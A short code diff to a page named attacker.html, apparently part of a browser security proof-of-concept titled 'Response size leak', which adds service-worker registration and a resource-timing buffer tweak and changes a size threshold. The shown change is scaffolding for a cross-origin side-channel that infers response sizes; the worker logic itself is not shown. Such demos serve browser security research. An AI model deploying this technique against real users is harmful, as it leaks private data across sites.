--- a/src/range-serviceworker/attacker.html
+++ b/src/range-serviceworker/attacker.html
@@ -4,7 +4,14 @@
     <title>Response size leak</title>
     <script>
 
-
+      if ("serviceWorker" in navigator) {
+				addEventListener("load", async () => {
+					performance.setResourceTimingBufferSize(1337);
+					const registration = await navigator.serviceWorker.register("serviceworker.js");
+					if (registration.installing)
+						location.reload();
+				});
+			}
 
 
       function show(element, url, size, event, diff) {
@@ -41,7 +48,7 @@
         small = 2;
         sizes = [
           2,
-          10000,
+          20000,
         ];
 
         elements = [
